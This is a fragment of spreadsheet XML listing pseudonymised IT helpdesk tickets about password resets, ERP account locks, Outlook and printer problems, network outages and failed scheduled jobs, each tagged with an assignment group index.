    <s v="_x000a_summary:urgent help required crm issue crm ribbon is grey / not active same issue with home tab and track and set regarding options"/>
    <s v="wbtrvdsi gdbuvszx"/>
    <x v="0"/>
  </r>
  <r>
    <s v="msd crm"/>
    <s v="when i turn on crm, it comes on as my name as a manager. i get all the opportunities from all over the world. i want it to just have my crm information there."/>
    <s v="qmpobijv wamtbupd"/>
    <x v="0"/>
  </r>
  <r>
    <s v="ms excel analysis addin: disabled"/>
    <s v="ms excel analysis addin: disabled"/>
    <s v="rhwsmefo tvphyura"/>
    <x v="0"/>
  </r>
  <r>
    <s v="can not populate the tranpertation zone in crm, when setting up a new customer."/>
    <s v="see attachments.  other csr were having the same issues on friday.9/23/16"/>
    <s v="pfzljgwa wqdficxk"/>
    <x v="14"/>
  </r>
  <r>
    <s v="blocked from expense report"/>
    <s v="_x000d__x000a__x000d__x000a_received from: proygkjt.mwetuhqf@gmail.com_x000d__x000a__x000d__x000a_it,_x000d__x000a__x000d__x000a_i was in the process of entering my expenses when i lost internet connection. now when trying to complete my expenses i receive the error below. please unblock._x000d__x000a__x000d__x000a_[cid:image001.jpg@01SID_357d1.d3717ec0]_x000d__x000a__x000d__x000a_best "/>
    <s v="proygkjt mwetuhqf"/>
    <x v="0"/>
  </r>
  <r>
    <s v="job Job_585 failed in job_scheduler at: 09/26/2016 08:37:00  "/>
    <s v="received from: monitoring_tool@company.com_x000d__x000a__x000d__x000a_job Job_585 failed in job_scheduler at: 09/26/2016 08:37:00"/>
    <s v="bpctwhsn kzqsbmtp"/>
    <x v="4"/>
  </r>
  <r>
    <s v="allow to edit contact info and upate back to erp."/>
    <s v="allow to edit contact info and update back to erp. this is w.r.t npr project go-live "/>
    <s v="dhkovprf pltndoab"/>
    <x v="20"/>
  </r>
  <r>
    <s v="outlook cannot connect to the server"/>
    <s v="outlook cannot connect to the server"/>
    <s v="gfjqrsxz bcyhezsl"/>
    <x v="2"/>
  </r>
  <r>
    <s v="engineering_tool uploading issue"/>
    <s v="global it service request (help@company.com)_x000d__x000a__x000d__x000a_best "/>
    <s v="zidcxslw clyfdaki"/>
    <x v="25"/>
  </r>
  <r>
    <s v="no audio in dell 7350 2 in 1 tablet"/>
    <s v="no audio in dell 7350 2 in 1 tablet"/>
    <s v="badgknqs xwelumfz"/>
    <x v="0"/>
  </r>
  <r>
    <s v="uacyltoe hxgaycze message"/>
    <s v="hallo liebe kollegen,_x000d__x000a__x000d__x000a_warum habe ich diese e-mail bekommen?_x000d__x000a_hat jemand etwas modifiziert in meine e-mail postfach?_x000d__x000a__x000d__x000a_Ã¼dvÃ¶zlettel / mit freundlichen grÃ¼ÃŸen / best "/>
    <s v="fmhlugqk dpraethi"/>
    <x v="0"/>
  </r>
  <r>
    <s v="erp accout had been locked"/>
    <s v="_x000d__x000a__x000d__x000a_received from: qyidkvap.cxnfdjpk@gmail.com_x000d__x000a__x000d__x000a_hello,sir_x000d__x000a__x000d__x000a_   my erp accout had been locked. can you help me? and i try to log in password_management_tool passoword system to unlock all the accout, also can to log in._x000d__x000a_  [cid:_foxmail.1@59ee6164-8282-a2ed-f56b-2bad30f2874e]_x000d__x000a__x000d__x000a__________________________________x000d__x000a__x000d__x000a_best "/>
    <s v="qyidkvap cxnfdjpk"/>
    <x v="0"/>
  </r>
  <r>
    <s v="reset the password for qekdgaim wagshrzl on erp / production / erp"/>
    <s v="SID_34 erp production system - please reset my password i cannot log in and need to perform the goods receipt on po "/>
    <s v="qekdgaim wagshrzl"/>
    <x v="0"/>
  </r>
  <r>
    <s v="need to configure printers"/>
    <s v="need to configure printers"/>
    <s v="olckhmvx pcqobjnd"/>
    <x v="0"/>
  </r>
  <r>
    <s v="reset the password for Å‚ukasz kutnik on other / telephony_software - interaction desktop"/>
    <s v="hey team,_x000d__x000a__x000d__x000a_can you please reset my password for the telephony_software - interaction desktop?_x000d__x000a__x000d__x000a_"/>
    <s v="wgqkKupL esgahtqn"/>
    <x v="6"/>
  </r>
  <r>
    <s v="open connection for erp - oss #321013"/>
    <s v="system (SID_34, SID_37, SID_39, SID_38, hrp, other ?): SID_7_x000a__x000a_enter user id of user having the issue: erp incident 321013/2016 (oss message)_x000a__x000a_provide access the same as this other user: mutoralkv_x000a__x000a_please open http and all necessary connections for erp and update in the oss message #321013"/>
    <s v="mxawhbun siyqthel"/>
    <x v="19"/>
  </r>
  <r>
    <s v="help"/>
    <s v="_x000d__x000a__x000d__x000a_received from: lanigpkq.qzhakunx@gmail.com_x000d__x000a__x000d__x000a_hello,_x000d__x000a_this morning i installed intel updates but while processing this my computer has blocked and i can not start windows.i can start it with safe mod.could you please connect my pc with team viewer_x000d__x000a__x000d__x000a__x000d__x000a__x000d__x000a_best "/>
    <s v="lanigpkq qzhakunx"/>
    <x v="32"/>
  </r>
  <r>
    <s v="collaboration_platform"/>
    <s v="_x000d__x000a__x000d__x000a_received from: xaertwdh.kcsagvpy@gmail.com_x000d__x000a__x000d__x000a_hi_x000d__x000a_please advise? i can not accesss collaboration_platform, it gives me this message._x000d__x000a__x000d__x000a_[cid:image001.jpg@01SID_357f8.38677c00]_x000d__x000a__x000d__x000a_kind "/>
    <s v="epAYsqnX RAkuDnXG"/>
    <x v="15"/>
  </r>
  <r>
    <s v="urgent: usb ports not working again."/>
    <s v="usb ports not working again after replacement. updated chipset drivers. issue persists. user wants the motherbankrd to be replaced._x000a__x000a_phone: "/>
    <s v="gpdywmbt pmxfiqkl"/>
    <x v="2"/>
  </r>
  <r>
    <s v="locked out again of erp prtgghj4k and SID_67"/>
    <s v="locked out again of erp prtgghj4k and SID_67_x000a_this keeps happening way too often_x000a__x000a_telephone:"/>
    <s v="qpkbiwzl urypnjvq"/>
    <x v="19"/>
  </r>
  <r>
    <s v="jartnine m called to give a status update"/>
    <s v="jartnine m called to give a status update"/>
    <s v="olckhmvx pcqobjnd"/>
    <x v="0"/>
  </r>
  <r>
    <s v="getting error while accessing it support review forms - pl refer above attachment "/>
    <s v="pl refer attachment "/>
    <s v="ginjmaxk zumkvfeb"/>
    <x v="18"/>
  </r>
  <r>
    <s v="receiving error with open order book nightly report"/>
    <s v="receiving error with open order book nightly report - please see attached screen shot"/>
    <s v="omufjcxr ahypftjx"/>
    <x v="12"/>
  </r>
  <r>
    <s v="SID_1 access"/>
    <s v="_x000a__x000a_received from: amrthruta.kadgdyam@company.com_x000a__x000a_hello team,_x000a__x000a_i have recently joined esg group as a programdnty engineer. request you to provide me access for SID_1 log in erp._x000a_please do the needful._x000a__x000a_[cid:image001.jpg@01SID_35813.0ecd3360]_x000a__x000a_"/>
    <s v="pwvmkeza mzwqgejy"/>
    <x v="19"/>
  </r>
  <r>
    <s v="network printer â€“ wy85 issue â€“ no print out  "/>
    <s v="_x000d__x000a__x000d__x000a_received from: rjanhbde.owfkyjcp@gmail.com_x000d__x000a__x000d__x000a_network printer â€“ wy85 issue â€“ no print out_x000d__x000a__x000d__x000a__x000d__x000a__x000d__x000a_warm "/>
    <s v="rjanhbde owfkyjcp"/>
    <x v="0"/>
  </r>
  <r>
    <s v="error message during document release"/>
    <s v="_x000a__x000a_received from: phqwmniy.kjucgqom@gmail.com_x000a__x000a_hello,_x000a__x000a_while releasing word file, drawings , route card showing error message server offline and document not get printed:_x000a_[cid:image001.jpg@01SID_35811.740c9ce0]_x000a__x000a_required help in resolving the issue,_x000a_[cid:image002.png@01SID_35811.740c9ce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x v="0"/>
  </r>
  <r>
    <s v="purchasing menue in shopping cart not working correct"/>
    <s v="see attached screenshot"/>
    <s v="rhinvtua aquyjfbs"/>
    <x v="29"/>
  </r>
  <r>
    <s v="application engineer database"/>
    <s v="_x000d__x000a__x000d__x000a_received from: bmudkpie.qolrvbip@gmail.com_x000d__x000a__x000d__x000a_hello,_x000d__x000a__x000d__x000a_we are using the application database, but i can't access it, see below._x000d__x000a__x000d__x000a_[cid:image001.png@01SID_357f1.9ea5f840]_x000d__x000a__x000d__x000a_best "/>
    <s v="bmudkpie qolrvbip"/>
    <x v="28"/>
  </r>
  <r>
    <s v="wifi &amp; lan not working in office "/>
    <s v="_x000d__x000a__x000d__x000a_received from: okycwstu.tvrnbgfs@gmail.com_x000d__x000a__x000d__x000a_hi,_x000d__x000a__x000d__x000a_there is a problem in wifi connection since last three days. also most of the lan connections are also not working._x000d__x000a__x000d__x000a_pl. check and resolve the issue aerp._x000d__x000a__x000d__x000a_"/>
    <s v="okycwstu tvrnbgfs"/>
    <x v="18"/>
  </r>
  <r>
    <s v="peer certificate rejected by chainverifier error ('godaddy certificate bundles - g2' certificate issue)"/>
    <s v="installation of 'godaddy certificate bundles - g2' (gd_bundle-g2.crt) is not proper in SID_25. we are getting peer certificate rejected by chainverifier error and not able to deploy and uacyltoe hxgaycze the functionality in dev. please refer ticket_no1537958 for earlier installation."/>
    <s v="hoyevanb ruwvniet"/>
    <x v="13"/>
  </r>
  <r>
    <s v="forgot password."/>
    <s v="forgot password."/>
    <s v="kpudhygb vnizrdeb"/>
    <x v="0"/>
  </r>
  <r>
    <s v="private address fields are enabled on employee master crm ui"/>
    <s v="disable private address fields, new &amp; edit buttons on employee master crm ui"/>
    <s v="tavsikpl dcrkwuny"/>
    <x v="14"/>
  </r>
  <r>
    <s v="cancel duplicate miro entry po#5019256094 (5321)"/>
    <s v="_x000d__x000a__x000d__x000a_received from: neokfwiy.ufriscym@gmail.com_x000d__x000a__x000d__x000a_dear it,_x000d__x000a__x000d__x000a_please help to reverse it , the screen shot is as below:_x000d__x000a__x000d__x000a_[cid:image001.png@01SID_3581b.e2456cf0]_x000d__x000a__x000d__x000a_best "/>
    <s v="neokfwiy ufriscym"/>
    <x v="9"/>
  </r>
  <r>
    <s v="reinstall company barcode fÃ¼r ewew8323753 \zlqfptjx xnklbfua"/>
    <s v="reinstall company barcode fÃ¼r ewew8323753 \zlqfptjx xnklbfua"/>
    <s v="zlqfptjx xnklbfua"/>
    <x v="24"/>
  </r>
  <r>
    <s v="kein email eingang von der adresse p.eggert@karl-roll.de. "/>
    <s v="es kann von dieser adresse nichts empfangen oder gesendet werden."/>
    <s v="egklxsoy hivwzjcf"/>
    <x v="0"/>
  </r>
  <r>
    <s v="wrong data in crm (wrong data signed to contact person during complaint creation)"/>
    <s v="we have opened complaint 7611184115: contact person is bnmdslzh qyinrmaf. we see in crm  signed 255948  number to contact person bnmdslzh qyinrmaf. when we opened this number we could see data other customet (mail and number). in complaint form are printed wrong data  - please see attached"/>
    <s v="ylitqvaj ljxdfhus"/>
    <x v="14"/>
  </r>
  <r>
    <s v="erp SID_34 password reset request."/>
    <s v="erp SID_34 password reset request."/>
    <s v="dbhwzfxy amhowrfk"/>
    <x v="0"/>
  </r>
  <r>
    <s v="reference to  ticket_no1553927 / chg0034452"/>
    <s v="_x000d__x000a__x000d__x000a_received from: ytwmgpbk.cpawsihk@gmail.com_x000d__x000a__x000d__x000a_hi,_x000d__x000a__x000d__x000a_could you please re-open this ticket. still the request is not resolved._x000d__x000a__x000d__x000a_"/>
    <s v="ytwmgpbk cpawsihk"/>
    <x v="19"/>
  </r>
  <r>
    <s v="job Job_3181 failed in job_scheduler at: 09/26/2016 05:00:00  "/>
    <s v="received from: monitoring_tool@company.com_x000d__x000a__x000d__x000a_job Job_3181 failed in job_scheduler at: 09/26/2016 05:00:00"/>
    <s v="bpctwhsn kzqsbmtp"/>
    <x v="9"/>
  </r>
  <r>
    <s v="query : change the screen saver."/>
    <s v="query : change the screen saver._x000d__x000a_"/>
    <s v="ylqvitsk bfnackrw"/>
    <x v="0"/>
  </r>
  <r>
    <s v="work center to be updated in pm order confirmation screen "/>
    <s v="hi _x000d__x000a__x000d__x000a_pm work center to be updated to pm order operations."/>
    <s v="ctngxwqa arbzlpmh"/>
    <x v="20"/>
  </r>
  <r>
    <s v="vpn on pc edmlx000001 can't work (urgent)"/>
    <s v="efyumrls gqjcbufx (finance and administration manager) is working with a new pc win 10, not company imaged._x000d__x000a_everything is working, except symantec endpoint protection. i can't install it. it goes in error._x000d__x000a_as antivirus, she has windows defender._x000d__x000a_unfortunately when she run the vpn, a message appear and it seems that she can't run the vpn due tu an antivirus not updated._x000d__x000a__x000d__x000a_she will be out of office for a few days this week, and she really needs the vpn connection._x000d__x000a__x000d__x000a_could you please check the issue ?_x000d__x000a__x000d__x000a_"/>
    <s v="ziwkespl dyehbrst"/>
    <x v="0"/>
  </r>
  <r>
    <s v="skype meeting option is not showing up in calendar."/>
    <s v="skype meeting option is not showing up in calendar."/>
    <s v="cqwtksbu tgxockrn"/>
    <x v="0"/>
  </r>
  <r>
    <s v="outlook issue"/>
    <s v="_x000d__x000a__x000d__x000a_received from: nxlzpgfr.rlqowmyt@gmail.com_x000d__x000a__x000d__x000a_i am unable to open the mails please refer the screen shot_x000d__x000a__x000d__x000a__x000d__x000a_best "/>
    <s v="nxlzpgfr rlqowmyt"/>
    <x v="0"/>
  </r>
  <r>
    <s v="erp SID_34 account "/>
    <s v="_x000d__x000a__x000d__x000a_received from: zuxcfonv.nyhpkrbe@gmail.com_x000d__x000a__x000d__x000a_gso,_x000d__x000a__x000d__x000a_please kindly unlock and reset password for erp SID_34 account zhhtyangq ,"/>
    <s v="zuxcfonv nyhpkrbe"/>
    <x v="0"/>
  </r>
  <r>
    <s v="launch adobe acrobat "/>
    <s v="_x000a_name:melerowicz_x000a_language:_x000a_browser:microsoft internet explorer_x000a_email:ubiqcrvy.mxjcnqfs@gmail.com_x000a_customer number:_x000a_telephone:+_x000a_summary:hi it-team, _x000a__x000a_i would like to open a pdf document but i got the message: before proceeding you must first launch adobe acrobat and accept the end user licence agreement. my user: melthryerj   could you please help "/>
    <s v="ubiqcrvy mxjcnqfs"/>
    <x v="0"/>
  </r>
  <r>
    <s v="network outage poncacity-schlumhdyhter-dmvpn-rtr located at usa is down. since 2:29 am on o9/26/16"/>
    <s v="what type of outage:  __x___network     _____circuit     _____power (please specify what type of outage)_x000d__x000a__x000d__x000a_1. top 23 cert site   ?    __no_______     (yes/no/na) _x000d__x000a__x000d__x000a_2. when did it start  ?   ____________2:29 am __on o9/26/16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bozdftwx smylqejw"/>
    <x v="7"/>
  </r>
  <r>
    <s v="account unlock - erp SID_34"/>
    <s v="unlocked account using password_management_tool _x000a__x000a_from: wgpimkle kijhcwur [mailto:wgpimkle.kijhcwur@gmail.com] _x000a_sent: monday, september 26, 2016 12:42 pm_x000a_to: nwfodmhc exurcwkm &lt;nwfodmhc.exurcwkm@gmail.com&gt;_x000a_subject: re: please unlock an id (sugisdfy)_x000a_importance: high_x000a__x000a_sorry again and again_x000a__x000a_i could unlock through password_management_tool._x000a_"/>
    <s v="wgpimkle kijhcwur"/>
    <x v="0"/>
  </r>
  <r>
    <s v="password "/>
    <s v="_x000d__x000a__x000d__x000a_received from: woxrljif.qymrszdk@gmail.com_x000d__x000a__x000d__x000a_hi_x000d__x000a__x000d__x000a_i changed my password last week now the laptop won't let me in._x000d__x000a__x000d__x000a_kind "/>
    <s v="woxrljif qymrszdk"/>
    <x v="0"/>
  </r>
  <r>
    <s v="problems with approval in universal work list"/>
    <s v="_x000a__x000a_received from: dkinobsv.wymgzcrh@gmail.com_x000a__x000a_dear it,_x000a__x000a_please help!_x000a__x000a_i need to approve this but cannot_x000a__x000a__x000a_the following expense report has been submitted for your approval:_x000a__x000a__x000a__x000a_personnel no.:    111319uy36  )_x000a__x000a_expense report no.:    2711125712_x000a__x000a_start date:    19.07.2016 00:00:00_x000a__x000a_end date:    23.08.2016 00:00:00_x000a__x000a_total costs:    usd 2.215,29_x000a__x000a_reimbursement amount:    usd 1.783,12_x000a__x000a__x000a__x000a_to review this expense report in full, please log into your universal worklist on manager self-service._x000a__x000a_i get this message_x000a__x000a_[cid:image001.jpg@01SID_357dc.d57e64c0]_x000a__x000a__x000a_--_x000a_mit freundlichen grÃ¼ÃŸen/ best "/>
    <s v="dkinobsv wymgzcrh"/>
    <x v="19"/>
  </r>
  <r>
    <s v="lean tracker not working"/>
    <s v="lean tracker not working"/>
    <s v="yhroaeqj djtyroha"/>
    <x v="0"/>
  </r>
  <r>
    <s v="unable to process in ecs "/>
    <s v="_x000a__x000a_received from: rxoynvgi.ntgdsehl@gmail.com_x000a__x000a_hi it team_x000a__x000a_kindly please assist as we unable to process dn 9169308075 in ecs._x000a_ecs system prompted below message._x000a__x000a_hi sujitra_x000a__x000a_kindly note that we unable to process dn 9169308075 in ecs and most probably this order will hold for today shipping, pending for solution._x000a__x000a_[cid:image001.png@01SID_3580e.9c668960]_x000a__x000a_hydstheud mddwwyleh_x000a_operation supervisor_x000a_company distribution services of asia pte ltd_x000a_( asia regional distribution centre)_x000a__x000a_email : rxoynvgi.ntgdsehl@gmail.com&lt;mailto:rxoynvgi.ntgdsehl@gmail.com&gt;"/>
    <s v="rxoynvgi ntgdsehl"/>
    <x v="12"/>
  </r>
  <r>
    <s v="dir 71913895  nxd  000  00  ac locked by user"/>
    <s v="dir 71913895  nxd  000  00  ac can't be opened for edit as it seems to be locked in the database (by wagfrtneh). dir is within status ac, all main originals seem to be checked in. so please unlock in the database."/>
    <s v="phedsjct lyphanue"/>
    <x v="13"/>
  </r>
  <r>
    <s v="support fÃ¼r rechner  messvorrichtung  \jionmpsf wnkpzcmv"/>
    <s v="support fÃ¼r rechner  messvorrichtung  \jionmpsf wnkpzcmv"/>
    <s v="jionmpsf wnkpzcmv"/>
    <x v="24"/>
  </r>
  <r>
    <s v="the purchasing doesn't work "/>
    <s v="there is no option in purchasing , check status is missed "/>
    <s v="zuxcfonv nyhpkrbe"/>
    <x v="29"/>
  </r>
  <r>
    <s v="rechner we_wu160 funktioniert nicht ."/>
    <s v="rechner we_wu160 funktioniert nicht ."/>
    <s v="jionmpsf wnkpzcmv"/>
    <x v="24"/>
  </r>
  <r>
    <s v="rechner fÃ¼r viotto funktioniert nicht"/>
    <s v="rechner fÃ¼r viotto funktioniert nicht"/>
    <s v="jionmpsf wnkpzcmv"/>
    <x v="24"/>
  </r>
  <r>
    <s v="job Job_2645 failed in job_scheduler at: 09/26/2016 03:30:00  "/>
    <s v="received from: monitoring_tool@company.com_x000d__x000a__x000d__x000a_job Job_2645 failed in job_scheduler at: 09/26/2016 03:30:00"/>
    <s v="bpctwhsn kzqsbmtp"/>
    <x v="5"/>
  </r>
  <r>
    <s v="node ldiw8511217sf located at usa village is down since 9/25/2016 2:44 pm"/>
    <s v="node ldiw8511217sf located at usa village is down since 9/25/2016 2:44 pm"/>
    <s v="spxqmiry zpwgoqju"/>
    <x v="7"/>
  </r>
  <r>
    <s v="hana report"/>
    <s v="_x000a__x000a_received from: bujiesrg.zopcrshl@gmail.com_x000a__x000a_dear all,_x000a_my hana report can't be refresh , can you help to check ?_x000a__x000a_[cid:image001.png@01SID_35806.dd83d2c0]_x000a__x000a__x000a__x000a_bujiesrg zopcrshl_x000a_specialist accounting and reporting_x000a_bujiesrg.zopcrshl@gmail.com&lt;mailto:bujiesrg.zopcrshl@gmail.com&gt;_x000a__x000a__x000a_"/>
    <s v="bujiesrg zopcrshl"/>
    <x v="8"/>
  </r>
  <r>
    <s v="truview application is down"/>
    <s v="truview application is down. we are not getting the alarms and also i saw today that the application is also down. "/>
    <s v="wczegmok bgqoclvs"/>
    <x v="3"/>
  </r>
  <r>
    <s v="looks like the tzornbldf network account is locked it needs to be unlocked aerp"/>
    <s v="the tzornbldf account is used to in 90% of the dashbankrds in reporting_tool.  this will affect 100's of sales employees/managers/directors as they will not be able to access their dashbankrds."/>
    <s v="hldifrbv gadyktfz"/>
    <x v="13"/>
  </r>
  <r>
    <s v="locked me out of erp "/>
    <s v="_x000a_i tried to change my password by password_management_tool password manager, i got an error message, but the password seems changed but i don't remember the entered code. _x000a__x000a_iewnguxv bufwxeiy has reset the windows password, by i can't enter erp. _x000a__x000a_can you please reset me in password_management_tool passwprd manager. _x000a__x000a__x000a_"/>
    <s v="adxuzbcv uojxrivy"/>
    <x v="0"/>
  </r>
  <r>
    <s v="issue to create skype meeting request on outlook"/>
    <s v="when i try to create skype meeting on outlook, there is no skype meeting button on outlook so i couldn't crete meeting request. please fix it. "/>
    <s v="fhcmnxat geazkjcs"/>
    <x v="0"/>
  </r>
  <r>
    <s v="job Job_1338 failed in job_scheduler at: 09/26/2016 02:28:00  "/>
    <s v="received from: monitoring_tool@company.com_x000d__x000a__x000d__x000a_job Job_1338 failed in job_scheduler at: 09/26/2016 02:28:00"/>
    <s v="bpctwhsn kzqsbmtp"/>
    <x v="8"/>
  </r>
  <r>
    <s v="job Job_1332 failed in job_scheduler at: 09/26/2016 02:26:00  "/>
    <s v="received from: monitoring_tool@company.com_x000d__x000a__x000d__x000a_job Job_1332 failed in job_scheduler at: 09/26/2016 02:26:00"/>
    <s v="bpctwhsn kzqsbmtp"/>
    <x v="8"/>
  </r>
  <r>
    <s v="tickets for jost berfkting classified as &quot;usa&quot; / usa users need properly classified in ticketing_tool."/>
    <s v="_x000d__x000a__x000d__x000a_received from: mynfoicj.riuvxdas@gmail.com_x000d__x000a__x000d__x000a_gso,_x000d__x000a__x000d__x000a_could you please verify why ticketing_tool tickets for dxyvfuhr uyfqgomx are classified as usa tickets? he is not usa, but ceo in europe of company. i checked two other users from switzerland, were the message did not display as it is correct. i actually thought the location would determine if users are from usa or not. can you advise what the issue with his user is? it needs correction._x000d__x000a__x000d__x000a_"/>
    <s v="mynfoicj riuvxdas"/>
    <x v="35"/>
  </r>
  <r>
    <s v="the unit prices of order #35990512 , item ! ~ 8 cannot be revised"/>
    <s v="we need to revise the pirces for order#35990512 to zno, 7800 for all the items._x000d__x000a_i changed for item #9 ~ #11, but cannot change for #1 ~ #8, please check and help, "/>
    <s v="tfazwrdv upwonzvd"/>
    <x v="12"/>
  </r>
  <r>
    <s v="unable to login to erp SID_34 account"/>
    <s v="unable to login to erp SID_34 account"/>
    <s v="rdpctwam jpweibfl"/>
    <x v="0"/>
  </r>
  <r>
    <s v="delivery note creation request"/>
    <s v="_x000d__x000a__x000d__x000a_received from: fbvpcytz.nokypgvx@gmail.com_x000d__x000a__x000d__x000a_hello it team,_x000d__x000a__x000d__x000a_could you please create delivery note for below order?_x000d__x000a_we got the error message hence we cannot issue the delivery noteâ€¦_x000d__x000a__x000d__x000a_so#35042381 / line item10_x000d__x000a_mm#3366140_x000d__x000a_order qty :1pc_x000d__x000a_delivery plant : plant_317_x000d__x000a__x000d__x000a_we can see available stock via md04 screen._x000d__x000a_[cid:image002.jpg@01SID_35805.b2550301]_x000d__x000a__x000d__x000a_but we cannot create delivery note for this item. we got below error message when we manually tried to issue the dnâ€¦(plant_327n)_x000d__x000a_[cid:image004.jpg@01SID_35805.b2550301]_x000d__x000a__x000d__x000a__x000d__x000a_"/>
    <s v="fbvpcytz nokypgvx"/>
    <x v="5"/>
  </r>
  <r>
    <s v="purchasing issue-pr can't release"/>
    <s v="document number 21745726_x000d__x000a_relevant document number (pr#) can't release with &quot;error in process&quot;.  no detail log or explanation._x000d__x000a_"/>
    <s v="zupifghd vdqxepun"/>
    <x v="29"/>
  </r>
  <r>
    <s v="outlook  -  keine rÃ¼ckmeldung"/>
    <s v="outlook_x000d__x000a_i'm not able to log-on to outlook thiw morning._x000d__x000a_i restarted my computer several times without any effort._x000d__x000a__x000d__x000a_"/>
    <s v="atlwdyej vtlhzbix"/>
    <x v="0"/>
  </r>
  <r>
    <s v="excel is blank when open excel file "/>
    <s v="excel is blank when open excel file "/>
    <s v="pwksivmq dbxajims"/>
    <x v="31"/>
  </r>
  <r>
    <s v="erp SID_34 account locked"/>
    <s v="erp SID_34 account locked"/>
    <s v="tvirflky febluink"/>
    <x v="0"/>
  </r>
  <r>
    <s v="outlookæ— æ³•ç™»é™† ,ä¸€ç›´æ˜¾ç¤ºæ­£åœ¨å¯åŠ¨ã€‚"/>
    <s v="outlookæ— æ³•ç™»é™† ,ä¸€ç›´æ˜¾ç¤ºæ­£åœ¨å¯åŠ¨ã€‚"/>
    <s v="eyoqnkjl gakhdebf"/>
    <x v="30"/>
  </r>
  <r>
    <s v="no accounting documents for #0159146993 &amp; #9047969100"/>
    <s v="there are no accounting documents for billings #0159146993 &amp; #0158070211 , please help!"/>
    <s v="tfazwrdv upwonzvd"/>
    <x v="9"/>
  </r>
  <r>
    <s v="excel is blank when open the excel file "/>
    <s v="excel is blank when open the excel file "/>
    <s v="pwksivmq dbxajims"/>
    <x v="0"/>
  </r>
  <r>
    <s v="ç™¾åº¦æœç´¢åŽ-æ–°ç½‘é¡µæ‰“ä¸å¼€"/>
    <s v="_x000a__x000a_received from: ktghvuwr.uwtakcmj@gmail.com_x000a__x000a_hello it_x000a__x000a_ç™¾åº¦æœç´¢åŽ-æ–°ç½‘é¡µæ‰“ä¸å¼€ï¼Œå¦‚é™„ä»¶æ‰€ç¤ºï¼Œè¯·å¸®å¿™å¤„ç†æˆ–æä¾›ä¸‹è§£å†³æ–¹æ¡ˆã€‚_x000a__x000a_è°¢è°¢ï¼_x000a__x000a__x000a_ktghvuwr uwtakcmj_x000a_sr. application engineer_x000a_optimization team_x000a_ktghvuwr.uwtakcmj@gmail.com&lt;mailto:ktghvuwr.uwtakcmj@gmail.com&gt;_x000a__x000a__x000a_"/>
    <s v="ktghvuwr uwtakcmj"/>
    <x v="31"/>
  </r>
  <r>
    <s v="user uthagtpgc - outlook issue"/>
    <s v="_x000a__x000a_received from: rgtarthi.erjgypa@company.com_x000a__x000a_hello help._x000a__x000a_geetha's outlook is not working at all. system is very slow._x000a_she has logged off and on thrice since morning._x000a__x000a_pls look into the attached files for the error message &amp; resolve at the earliest._x000a__x000a__x000a_"/>
    <s v="xqoljzbh aydcwkxt"/>
    <x v="0"/>
  </r>
  <r>
    <s v="anzeigen der bestellÃ¼bersicht im erp netweaver portal nicht mÃ¶glich"/>
    <s v="im erp netweaver portal ist es nicht mehr mÃ¶glich unter dem paramdntyeter &quot;feinnavigation&quot; die bestellÃ¼bersicht aufzurufen._x000d__x000a_siehe angefÃ¼gte screenshots"/>
    <s v="dnjxilqu povreyhq"/>
    <x v="0"/>
  </r>
  <r>
    <s v="erp t-code error"/>
    <s v="_x000d__x000a__x000d__x000a_received from: ohdrnswl.rezuibdt@gmail.com_x000d__x000a__x000d__x000a_hi,_x000d__x000a__x000d__x000a_please find below error._x000d__x000a__x000d__x000a_kindly help to resolve this issue on urgent basis._x000d__x000a__x000d__x000a_[cid:image001.png@01SID_357e1.3c351d40]_x000d__x000a__x000d__x000a__x000d__x000a__x000d__x000a_best "/>
    <s v="ohdrnswl rezuibdt"/>
    <x v="19"/>
  </r>
  <r>
    <s v="erpç³»ç»Ÿç™»å½•åŽï¼Œé‡‡è´­é¡µé¢æ— æ³•æ˜¾ç¤º&quot;åŽç»­å‡­è¯&quot;ï¼Œè¯·å¤„ç†"/>
    <s v="erpç³»ç»Ÿç™»å½•åŽï¼Œé‡‡è´­é¡µé¢æ— æ³•æ˜¾ç¤º&quot;åŽç»­å‡­è¯&quot;ï¼Œè¯·å¤„ç†"/>
    <s v="lszhkxoy blemoyjd"/>
    <x v="30"/>
  </r>
  <r>
    <s v="error message during route card release"/>
    <s v="_x000a__x000a_received from: phqwmniy.kjucgqom@gmail.com_x000a__x000a_hello,_x000a__x000a_while route card release error message appearing  and route card not get printed:_x000a_[cid:image003.jpg@01SID_357da.882f8250]_x000a__x000a_required help in resolving the issue,_x000a_[cid:image004.png@01SID_357da.882f825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x v="44"/>
  </r>
  <r>
    <s v="network outage"/>
    <s v="network outage_x000a_unable to connect both lan and wi fi_x000a__x000a_india location_x000a_contact no:- _x000a__x000a__x000a__x000a_"/>
    <s v="dwafrmth oabwzitv"/>
    <x v="3"/>
  </r>
  <r>
    <s v="job Job_2110 failed in job_scheduler at: 09/26/2016 00:05:00  "/>
    <s v="received from: monitoring_tool@company.com_x000d__x000a__x000d__x000a_job Job_2110 failed in job_scheduler at: 09/26/2016 00:05:00"/>
    <s v="bpctwhsn kzqsbmtp"/>
    <x v="8"/>
  </r>
  <r>
    <s v="erp printing issue"/>
    <s v="from: sridthshar herytur _x000a_sent: monday, september 26, 2016 9:23 am_x000a_to: erpbasis-support_x000a_cc: cedroapx blsktzgq; fdmaluyo tvecikxn; mvfnbces urbckxna1; nawkpdtx gwcvmbhn_x000a_subject: erp printing issue_x000a__x000a_hi all, _x000a__x000a_again same problem repeats on erp printing for plant. below printer error issue._x000a__x000a_ _x000a__x000a_radyhthika : kindly raise the request for same and concern team._x000a__x000a_best "/>
    <s v="antigvjx zekluqim"/>
    <x v="13"/>
  </r>
  <r>
    <s v="network outage: usa vpn router is down since 08:02 pm et on 09/25. no backup"/>
    <s v="what type of outage:  ___x__network     _____circuit     _____power (please specify what type of outage)_x000d__x000a__x000d__x000a_1. top 23 cert site   ?    ____no_____     (yes/no/na) _x000d__x000a__x000d__x000a_2. when did it start  ?   ________08:02 pm et on 09/25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no____    (yes/no/na) _x000d__x000a__x000d__x000a_6. backup circuit active ?   ____na____     (yes/no/na) _x000d__x000a__x000d__x000a_7. site contact notified (phone/email) ?  ____no_____     (yes/no/na) _x000d__x000a__x000d__x000a_8. remote dial-in ?   _____na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attendance_tool password not working"/>
    <s v="_x000d__x000a__x000d__x000a_received from: rsvminjz.tcpqvbae@gmail.com_x000d__x000a__x000d__x000a_hi,_x000d__x000a__x000d__x000a_my attendance_tool password is not working. kindly reset the same &amp; give me the new password._x000d__x000a__x000d__x000a__x000d__x000a__x000d__x000a_"/>
    <s v="rsvminjz tcpqvbae"/>
    <x v="0"/>
  </r>
  <r>
    <s v=" regarding cell phone model."/>
